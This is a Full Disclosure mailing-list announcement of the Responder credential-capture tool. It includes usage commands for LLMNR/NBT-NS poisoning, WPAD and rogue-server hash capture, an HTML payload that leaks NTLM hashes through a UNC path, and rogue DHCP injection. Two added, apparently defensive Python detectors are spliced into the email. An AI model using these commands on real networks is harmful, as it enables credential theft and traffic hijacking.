[FD] [Tool] Responder v2.1.3
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] [Tool] Responder v2.1.3
- From: laurent gaffie <laurent.gaffie@xxxxxxxxx>
- Date: Fri, 28 Nov 2014 01:31:00 -0500
Responder is an Active Directory/Windows environment takeover tool suite
that can stealthily take over any default Active Directory environment
(including Windows 2012R2).
Most of the attacks in this tool are hard to detect and are highly
successful.
This version includes several enhancements:
- Analyze Mode: Figure out what kind of network you're dealing with before
doing anything:
  - Map all workstations, domain forests, SQL servers within maximum 12
minutes, no user interaction; The Lanman module will query any hosts who
sent a Domain Master Browser announcement on the subnet to extract that
domain computer list and additional forests
(https://support.microsoft.com/KB/188001 -> "Only the PDC can be a domain
master browser").
  - Figure out right away if you can use ICMP Redirect on that subnet
automatically.
  - Figure out what's going on on this network; Is there a NAC/IPS/etc
trying to detect NBT-NS/LLMNR poisoning by sending random nonexistent names?
  - Allows a client/sysadmin to see if remediation was done properly.
- WPAD module; Choose if you want to intercept/inject traffic, get NTLMv1/2
hashes transparently or get plain text sets of credentials.
This module is highly effective and will gather any workstation's sets of
credentials on a default environment with no user interaction (unless
you're using -b for plaintext credentials).
- Kerberos server. Grab Kerberos AS-REQ Pre-Auth type 23 hashes (hashcat -m
7500).
- In-scope names or IPs to respond to (LLMNR/NBT-NS).
- Names or IPs (LLMNR/NBT-NS) you don't want to respond to (detected
NAC/IPS, out of scope multicast LLMNR, etc).
- Find MSSQL servers with the MSSQL Browser Service, one packet.
- Rogue servers included:
  - SMB NTLMv1/2, Clear text passwords for NT4, and LM hashing downgrade
when the --lm option is set.
  - MSSQL Auth server supports NTLMv1, LMv2 hashes and MSSQL plaintext
auth.
  - HTTP Auth server NTLMv1/2 and basic.
  - HTTPS NTLMv1/2 and basic auth.
  - LDAP NTLMv1/2 and plaintext auth.
  - FTP clear text credentials.
  - POP3 clear text credentials.
  - SMTP clear text credentials.
  - IMAP clear text credentials.
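The Analyze Mode text above mentions NAC/IPS products that detect NBT-NS/LLMNR poisoning by querying random names that cannot exist. The script below is an added example of that canary check written for this post; it is not part of the Responder release or of any product. It builds an LLMNR query for a random name, and any positive answer to that name is flagged as a likely poisoner. Packet layout follows RFC 4795 (LLMNR reuses the DNS header, question and answer format); the sample response is constructed inline, not captured, and the multicast group/port constants are the standard LLMNR values.

```python
import secrets
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # LLMNR IPv4 multicast group (RFC 4795)
LLMNR_PORT = 5355


def encode_name(name: str) -> bytes:
    """Encode a host name as DNS-style length-prefixed labels."""
    out = b"".join(struct.pack("B", len(label)) + label.encode("ascii")
                   for label in name.split("."))
    return out + b"\x00"


def decode_name(data: bytes, offset: int):
    """Decode labels at offset, following 0xC0 compression pointers; returns (name, next offset)."""
    labels = []
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:
            ptr = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            tail, _ = decode_name(data, ptr)
            labels.append(tail)
            return ".".join(labels), offset + 2
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def random_canary_name() -> str:
    """A name no legitimate host resolves, e.g. canary-3f9a1c20 (constructed prefix)."""
    return "canary-" + secrets.token_hex(4)


def build_llmnr_query(name: str, txid: int) -> bytes:
    """LLMNR query: 12-byte header (id, flags=0, qdcount=1) plus one A/IN question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def parse_llmnr_response(data: bytes) -> dict:
    """Parse header, questions and answers; A-record rdata is rendered as dotted quad."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    offset, questions, answers = 12, [], []
    for _ in range(qd):
        name, offset = decode_name(data, offset)
        qtype, qclass = struct.unpack("!HH", data[offset:offset + 4])
        offset += 4
        questions.append((name, qtype, qclass))
    for _ in range(an):
        name, offset = decode_name(data, offset)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata = data[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rdlen == 4:
            rdata = ".".join(str(b) for b in rdata)
        answers.append((name, rtype, rdata))
    return {"txid": txid, "is_response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}


def classify_response(data: bytes, expected_txid: int, canary_names: set):
    """Return an alert dict when a response answers one of our canary names, else None."""
    resp = parse_llmnr_response(data)
    if not resp["is_response"] or resp["txid"] != expected_txid:
        return None
    hits = [(name, rdata) for name, rtype, rdata in resp["answers"]
            if name.lower() in canary_names]
    if not hits:
        return None
    return {"severity": "high",
            "reason": "LLMNR answer received for a name that does not exist; "
                      "a poisoner is likely active on this subnet",
            "answers": hits}


def build_sample_poisoned_response(query: bytes, answering_ip: str) -> bytes:
    """Constructed sample (not a capture): a positive A answer echoing the queried name."""
    txid = struct.unpack("!H", query[:2])[0]
    name, _ = decode_name(query, 12)
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    rdata = bytes(int(o) for o in answering_ip.split("."))
    answer = encode_name(name) + struct.pack("!HHIH", 1, 1, 30, 4) + rdata
    return header + query[12:] + answer


def probe_subnet(timeout: float = 2.0) -> list:
    """Send one canary query to the LLMNR group and collect alerts (needs network access)."""
    canary = random_canary_name()
    txid = secrets.randbelow(0x10000)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(canary, txid), (LLMNR_GROUP, LLMNR_PORT))
    alerts = []
    try:
        while True:
            data, (src, _port) = sock.recvfrom(1024)
            alert = classify_response(data, txid, {canary})
            if alert:
                alert["source"] = src
                alerts.append(alert)
    except socket.timeout:
        pass
    finally:
        sock.close()
    return alerts


if __name__ == "__main__":
    for found in probe_subnet():
        print(found)
```

Run it periodically from a monitoring host on each segment; a clean network never answers a canary name, so the only false positives come from hosts that answer every LLMNR query, which is exactly what you want to hear about. The transaction id check keeps unrelated LLMNR traffic from being counted.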
Usage example:
./Responder.py -i YourIP -A
--> -A Analyze Mode, be a ninja; Port scanning is for losers.
./Responder.py -i YourIP -rFv
--> -r use workstation redirector for NBT-NS
--> -F force auth on wpad.dat files retrieval (highly efficient)
--> -v be verbose, print all queries.
./Responder.py -i YourIP -rw
--> -w enable WPAD server, grab requests and try to inject a custom html
payload into the HTML page sent to the victim. Default HTML is:
"<html><head></head><body><img src='file:\\\\\RespProxySrv\ssed\seyad.ico'
alt='Loading' height='1' width='2'></body></html>". If nothing is specified
in Responder.conf under "HTMLToServe" then nothing will be injected.
./FindSQLSrv.py
--> Map MSSQL servers on your subnet, one packet.
./DHCP.py -I eth0 -i 10.20.30.40 -d pwned.com -p 10.20.30.40 -s 10.20.30.1 -r 10.20.40.1
##DHCP INFORM##
--> -i Yourip
--> -d Domain to inject
--> -p Primary domain to inject
--> -s Secondary domain to inject
--> -r Gateway/Router to inject
##/DHCP INFORM##
--> (Optional -R) Respond to DHCP Requests, inject Linux/Windows clients
usually faster than the actual DHCP server.
Use this in conjunction with Responder's DNS server or Pcredz
(https://github.com/lgandx/PCredz)
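The DHCP INFORM/Request injection described above changes a client's DNS servers, domain name and gateway. A client-side or sensor-side check is to parse every DHCP OFFER/ACK seen on the segment and compare the injected-prone options against a known-good baseline. The following is an added example written for this post, not part of Responder or DHCP.py: the baseline values and both sample packets are constructed; the rogue sample reuses the addresses from the DHCP.py usage line above (-p 10.20.30.40 -s 10.20.30.1 -r 10.20.40.1 -d pwned.com). Option codes and layout follow RFC 2131/2132.

```python
import ipaddress
import struct

# Constructed baseline for this segment (assumption; in practice taken from
# the real DHCP server's configuration or a known-good capture).
BASELINE = {"server_id": "10.20.30.2", "router": "10.20.30.1",
            "dns": {"10.20.30.2"}, "domain": "corp.example"}

MAGIC_COOKIE = b"\x63\x82\x53\x63"   # marks the start of DHCP options


def parse_dhcp(packet: bytes) -> dict:
    """Parse the BOOTP fixed header and the DHCP option TLVs."""
    if len(packet) < 240 or packet[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP packet")
    op, _htype, _hlen, _hops, xid = struct.unpack("!BBBBI", packet[:8])
    yiaddr = str(ipaddress.IPv4Address(packet[16:20]))
    options, i = {}, 240
    while i < len(packet):
        code = packet[i]
        if code == 0:        # pad
            i += 1
            continue
        if code == 255:      # end of options
            break
        length = packet[i + 1]
        options[code] = packet[i + 2:i + 2 + length]
        i += 2 + length
    return {"op": op, "xid": xid, "yiaddr": yiaddr, "options": options}


def ip_set(raw: bytes) -> set:
    """Option payloads holding a list of IPv4 addresses, as a set of strings."""
    return {str(ipaddress.IPv4Address(raw[j:j + 4])) for j in range(0, len(raw), 4)}


def audit_dhcp_reply(packet: bytes, baseline: dict) -> list:
    """Return (field, expected, observed) for every audited option that deviates
    from the baseline. Only BOOTREPLY (op=2) OFFER (53=2) or ACK (53=5) are audited."""
    p = parse_dhcp(packet)
    opts = p["options"]
    if p["op"] != 2 or opts.get(53, b"\x00")[0] not in (2, 5):
        return []
    findings = []
    if 54 in opts:                                    # server identifier
        seen = str(ipaddress.IPv4Address(opts[54]))
        if seen != baseline["server_id"]:
            findings.append(("server_id", baseline["server_id"], seen))
    if 3 in opts and ip_set(opts[3]) != {baseline["router"]}:   # router
        findings.append(("router", baseline["router"], sorted(ip_set(opts[3]))))
    if 6 in opts and ip_set(opts[6]) != baseline["dns"]:        # DNS servers
        findings.append(("dns", sorted(baseline["dns"]), sorted(ip_set(opts[6]))))
    if 15 in opts:                                    # domain name
        seen = opts[15].rstrip(b"\x00").decode("ascii", "replace")
        if seen != baseline["domain"]:
            findings.append(("domain", baseline["domain"], seen))
    return findings


def packed(addr: str) -> bytes:
    return ipaddress.IPv4Address(addr).packed


def build_sample_ack(server_id, router, dns, domain, xid=0x3903F326) -> bytes:
    """Constructed sample DHCPACK (not a capture) carrying the options the audit inspects."""
    hdr = struct.pack("!BBBBIHH", 2, 1, 6, 0, xid, 0, 0)          # op=BOOTREPLY, Ethernet
    hdr += bytes(4) + packed("10.20.30.77") + packed(server_id) + bytes(4)  # ciaddr, yiaddr, siaddr, giaddr
    hdr += bytes(16) + bytes(64) + bytes(128)                         # chaddr, sname, file
    dns_raw = b"".join(packed(d) for d in dns)
    dom = domain.encode("ascii")
    opts = (MAGIC_COOKIE + bytes([53, 1, 5]) + bytes([54, 4]) + packed(server_id)
            + bytes([3, 4]) + packed(router) + bytes([6, len(dns_raw)]) + dns_raw
            + bytes([15, len(dom)]) + dom + b"\xff")
    return hdr + opts


# Legitimate reply matches the baseline; the rogue one uses the values from
# the DHCP.py usage line in the post.
LEGIT_ACK = build_sample_ack("10.20.30.2", "10.20.30.1", ["10.20.30.2"], "corp.example")
ROGUE_ACK = build_sample_ack("10.20.30.40", "10.20.40.1",
                             ["10.20.30.40", "10.20.30.1"], "pwned.com")

if __name__ == "__main__":
    print("legit:", audit_dhcp_reply(LEGIT_ACK, BASELINE))
    for finding in audit_dhcp_reply(ROGUE_ACK, BASELINE):
        print("rogue DHCP option:", finding)
```

Fed with packets from a passive capture on the segment (or from a client's own DHCP exchange), any finding here means a second DHCP server is answering, which is also the case DHCP snooping on the switch is meant to block. The server identifier check is the cheapest signal: a legitimate segment has exactly one.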
Github: https://github.com/Spiderlabs/Responder
Twitter for the latest updates: https://twitter.com/PythonResponder
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/